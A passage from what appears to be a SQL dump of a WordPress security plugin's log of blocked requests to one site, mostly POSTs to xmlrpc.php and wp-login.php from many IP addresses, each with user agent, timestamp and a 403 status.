Safari\\/537.36\"}','hcTeFLE3vAuRPirmONdg7Jfk',0,1664380522.9209,1032,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','JcZlUqxLzYnasfF7ITEQv6ij',0,1664380501.4484,530,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','bmwUxHutJpY1ds3OB9D8FEr0',0,1664380499.4323,562,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','TdGizqOKMRfrHAuXeo1Fv36Y',0,1664380488.0092,7789,'','POST',403,0,515,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','0a4cEX3iozFwRlBqsfQI8jYd',0,1664379704.0258,501,'','POST',403,0,600,0,1,'',0),('138.68.90.29',2319735325,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','sf8hmieO2WvVHyKb5MN3ILPJ',0,1664379679.8033,17427,'','POST',403,0,600,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','GQhiB7HrTSDZXoe1Kpx9ygNn',0,1664378524.8131,1349,'','POST',403,0,600,0,1,'',0),('213.152.162.84',3583550036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','krgd5pGVhEaOo9CRDumiKHNB',0,1664378126.6852,2323,'','POST',403,0,515,0,1,'',0),('205.185.121.252',3451484668,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','zCOjB7J9hfVtmHvqA6XedpsP',0,1664378069.1952,1568,'','POST',403,0,600,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','meHof40SbnT1jFyxVutczLZG',0,1664377384.9114,8526,'','POST',403,0,600,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','spZ2N6AMwe0yOC8iEkRf139m',0,1664409951.2047,9102,'','POST',403,0,515,0,1,'',0),('18.206.253.21',315555093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SpH5aohZRQzrc0K6sWImEx2A',0,1664409784.7648,1286,'','POST',403,0,515,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dsqPIxkn53bAyZ7XYEhuli4R',0,1664420523.2471,19014,'','POST',403,0,515,0,1,'',0),('188.166.163.52',3165037364,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oV7GkyqLF0UaYBruPXvdpjfc',0,1664424068.0582,17774,'','POST',403,0,515,0,1,'',0),('173.247.254.32',2918710816,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n01gikI6qeJu2G3r8RUshT9d',0,1664428368.6122,18704,'','POST',403,0,515,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IO1LD8XsNHYMJdFgBthqr9bC',0,1664427811.2083,19636,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7FcVkQ6gNZIAPDqRLKrmpM5G',0,1664428026.6367,18905,'','POST',403,0,515,0,1,'',0),('131.153.50.250',2207855354,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DVOZoiXj5l3WytMTGYfv7rP4',0,1664464645.6930,18823,'','POST',403,0,515,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','Xf27YndZ6rLFc8a3H5quJBhG',0,1664490669.6028,14111,'','POST',403,0,600,0,1,'',0),('199.249.230.12',3355043340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Sy5prhkgKFCRcdLniJe8ExIN',0,1664490540.6627,18892,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','Fx08wnovGCbpQcS1O3dlkUrs',0,1664497170.7443,672,'','POST',403,0,600,0,1,'',0),('5.39.104.183',86468791,'','http://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','0G5fs9FD2Mg7kSREPc83ZzeX',0,1664498859.8411,581,'','GET',403,0,700,0,1,'',0),('213.152.186.173',3583556269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JAT2KrXPB6UqZ5OlFSnsoCiH',0,1664499670.7988,18519,'','POST',403,0,515,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','Uk5SfTM3ejWIGlDA1qdv4Eaw',0,1664504331.9077,1195,'','POST',403,0,600,0,1,'',0),('216.250.116.85',3640292437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VURabZ05KAeXFLynstJIWilo',0,1664536519.6415,20360,'','POST',403,0,515,0,1,'',0),('5.101.157.25',90545433,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nNRd5HV03ifzUag8BqPXl1Jv',0,1664557518.1343,2480,'','POST',403,0,515,0,1,'',0),('137.184.209.117',2310590837,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dKOEIxekliBL4Gpv6sS3T10u',0,1664557758.6712,18391,'','POST',403,0,515,0,1,'',0),('177.52.160.29',2973016093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4O16rTAX3YtoGcNvPxkmShLR',0,1664557296.1580,10324,'','POST',403,0,515,0,1,'',0),('47.104.66.61',795361853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XVZD3bxMQ1BYOg4JCHePsutG',0,1664577191.0673,13060,'','POST',403,0,515,0,1,'',0),('154.0.165.146',2583733650,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bKnuoS47XJg9phQIfkzMdFyl',0,1664576887.2908,18196,'','POST',403,0,515,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GjJeCbK1MwctmlHufgzxv60R',0,1664576215.3496,1372,'','POST',403,0,515,0,1,'',0),('116.255.178.218',1962914522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NHUtvbe12cYO03dzkfhL9FSD',0,1664576689.1630,18529,'','POST',403,0,515,0,1,'',0),('162.214.92.6',2731957254,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YjPWyCoMsJgB1nfSv6eh9E7L',0,1664575922.9075,18156,'','POST',403,0,515,0,1,'',0),('188.132.174.112',3162812016,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v6tTwny7eQJXVaKpSGAmD4M9',0,1664575706.2856,1294,'','POST',403,0,515,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','2wVs6Xz5nTeFUkM3axRL1Hp7',0,1664579834.2509,1436,'','POST',403,0,600,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Eb4Bf5agOq76ApwLCxsWFQJo',0,1664579635.8619,18800,'','POST',403,0,515,0,1,'',0),('31.184.242.14',532214286,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SZwoLYkXOVfe2Uq17iEQyNh6',0,1664579153.4569,13147,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2VKeNLCH8WwnU0FjqG6bJZta',0,1664578856.2165,13830,'','POST',403,0,515,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5ZmcNBH7Rab0ThsjiGlV2y4E',0,1664584064.4246,1495,'','POST',403,0,515,0,1,'',0),('45.77.131.169',760054697,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XEkv2bAjhYUCeOioDrBN7Q0n',0,1664583838.9499,1998,'','POST',403,0,515,0,1,'',0),('190.171.170.94',3198921310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','P9gNh5alKmns3icYJpxI0VrW',0,1664583555.0672,1402,'','POST',403,0,515,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dkbZFUKBxTpNw47Ch5EcWRsP',0,1664583087.5985,1488,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','bA9XGsmO0p6J1QaNl8Vu2o3w',0,1664582856.5515,576,'','POST',403,0,600,0,1,'',0),('111.223.36.152',1876894872,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','b98Jk1dseuD0fEjGFT43BhXO',0,1664582823.0150,1506,'','POST',403,0,515,0,1,'',0),('116.255.178.218',1962914522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pa13cLCIA9lQ5fkMZXnUeytx',0,1664589409.1489,1473,'','POST',403,0,515,0,1,'',0),('34.254.111.139',587100043,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Pd4L2rvyKgOUtYHqeRhiQWxM',0,1664587018.0706,1800,'','POST',403,0,515,0,1,'',0),('205.185.117.143',3451483535,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','y0EKsPeGmrRVZ3uIaLhMXgQN',0,1664587050.3488,510,'','POST',403,0,600,0,1,'',0),('91.231.84.41',1541887017,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','81VhmK092ibXvHzQFWPY4LeC',0,1664587093.8220,1477,'','POST',403,0,515,0,1,'',0),('101.99.95.162',1701011362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zItYDqXPAEoe1m0wGCfvyRVO',0,1664587263.2206,6309,'','POST',403,0,515,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iXhcDdBS5OxIpksK18uRmgYV',0,1664587567.0693,19457,'','POST',403,0,515,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uYJiLlfQ8kI9MjO21BVRbvCD',0,1664588081.3703,18436,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cJ5Ok4CMoLRfZ9QGaXxsiwI8',0,1664588321.5083,19161,'','POST',403,0,515,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hCf6B8Tneu1q72rOGklYMSmt',0,1664588623.1763,18273,'','POST',403,0,515,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kHGKre1xDCNWM479b36udOPp',0,1664589174.5922,18765,'','POST',403,0,515,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iQUMxC5dKkA9wXZfr4B1LaJu',0,1664586189.8573,15523,'','POST',403,0,515,0,1,'',0),('173.212.201.41',2916403497,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YUgey17LXTO6dxK2C8sZtlIv',0,1664586728.7913,18698,'','POST',403,0,515,0,1,'',0),('39.106.15.209',661262289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6siKw0rvHLhcd8NEpIbQe5jC',0,1664590786.5208,2418,'','POST',403,0,515,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5REuqdXvV8bpjUfIWKgm0ktN',0,1664590467.9723,5887,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8h5LpkyRPQz2uV6EMWA34rDa',0,1664590244.7243,19859,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','TYS2XPezZqfIGBgUu3HkVb6Q',0,1664595174.9162,1921,'','POST',403,0,515,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kSy5TYla6cjbVAqsvEwGd4t8',0,1664594972.4377,1420,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','da0qKm1b6JXctH9ZYF2lnMjO',0,1664594580.0465,18440,'','POST',403,0,515,0,1,'',0),('120.79.8.125',2018445437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JKeMiCHuP9BxbETgOSoGn7md',0,1664594385.8031,1336,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php','','{\"1\":\"ALittle Client\"}','4qoNAsbwz7UWO1mh3B0X5Fna',0,1664593757.9607,323,'','GET',403,0,700,0,1,'',0),('185.49.20.77',3107001421,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xsOKIPzkoLF5veb7CNyWM068',0,1664593972.4091,18065,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Wqoh2AT6HJKtp0FPNrR1IQiD',0,1664593717.1821,1432,'','POST',403,0,515,0,1,'',0),('68.183.15.215',1152847831,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n0IMv41fXNV3dsxWkEeP79qQ',0,1664593473.1763,11035,'','POST',403,0,515,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ODGc1iQfmj6zMhvrtYSFUlnk',0,1664597446.3781,1458,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hFCH4beBORI3YKl27jETfQ0q',0,1664597274.8557,12617,'','POST',403,0,515,0,1,'',0),('161.35.15.73',2703429449,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v80tONirTUMgH12VZuDRWxPS',0,1664597114.2843,4644,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cIdBwxtRgA8nFGebfs5z7YZX',0,1664596948.2467,1283,'','POST',403,0,515,0,1,'',0),('185.241.5.213',3119580629,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XS5KlTgqLD1IR9ZHpjsMWkiu',0,1664596819.5241,1565,'','POST',403,0,515,0,1,'',0),('92.222.68.53',1558070325,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WE5hIDTN49R7YgOK3PxA26nc',0,1664601760.3406,17240,'','POST',403,0,515,0,1,'',0),('162.240.211.236',2733691884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VdcjJoKbkDtEq7snL4Ox0A1B',0,1664601641.0909,1655,'','POST',403,0,515,0,1,'',0),('35.213.170.208',601205456,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HBnxypZqijFuV5to8sevhWkf',0,1664601463.9739,18652,'','POST',403,0,515,0,1,'',0),('103.145.50.127',1737568895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Uw07lOIgZ8cYdTuRriahHQmX',0,1664601346.5850,18778,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','KSHbYqdpozxU5OrtJnTMAZaP',0,1664601195.1802,1583,'','POST',403,0,600,0,1,'',0),('207.246.108.230',3489033446,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rMkASI8mCLdsinGXRZ0jNluO',0,1664601170.8078,3905,'','POST',403,0,515,0,1,'',0),('93.114.235.167',1567812519,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1tyBc2n3eDFZxs4k0qplMm7i',0,1664601060.1476,18789,'','POST',403,0,515,0,1,'',0),('173.212.201.41',2916403497,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SLlpUDN1ZBxAeYo4nRIvbO3Q',0,1664600887.6090,18517,'','POST',403,0,515,0,1,'',0),('162.215.240.160',2732060832,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cf86a2yHsdQNYEpLB0uGMeWI',0,1664600630.8745,18539,'','POST',403,0,515,0,1,'',0),('38.242.135.133',653428613,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c9pv4jfVPdsOBIkTayLFxRoz',0,1664600484.9046,19744,'','POST',403,0,515,0,1,'',0),('103.8.25.74',1728584010,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FjSDJiBTUscZf4XmxwYb1Nuk',0,1664605112.9657,19585,'','POST',403,0,515,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v2xIa1itjTy0mQAOksPH58Nf',0,1664605587.8338,19110,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uhJN18BHXaIdnfxsWQ3FYMeo',0,1664604913.9926,19996,'','POST',403,0,515,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sbeMKWnqOREgjJ8afdFQ51B9',0,1664604759.2943,14470,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Q4Bwe3YMLFgjX0npt5K2OhSz',0,1664604579.1346,4646,'','POST',403,0,515,0,1,'',0),('66.45.251.157',1110309789,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d7HOa2TVKYJcwQoXtGSu6li0',0,1664604421.0498,14273,'','POST',403,0,515,0,1,'',0),('50.59.99.98',842752866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','W2yCIoTBLPkul5cRXQNfx9Mp',0,1664604238.2154,18484,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','gGiH1xN8ZJjvzVqlaRf92AFo',0,1664608089.7971,1090,'','POST',403,0,600,0,1,'',0),('157.7.190.241',2634530545,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','ZkAbsQ8GryLqpIeaJfK5XCB6',0,1664608084.8845,1543,'','POST',403,0,600,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','YeNFhVOf2P1wJl6aoQzbGE90',0,1664608085.2946,1129,'','POST',403,0,600,0,1,'',0),('78.47.46.81',1311714897,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 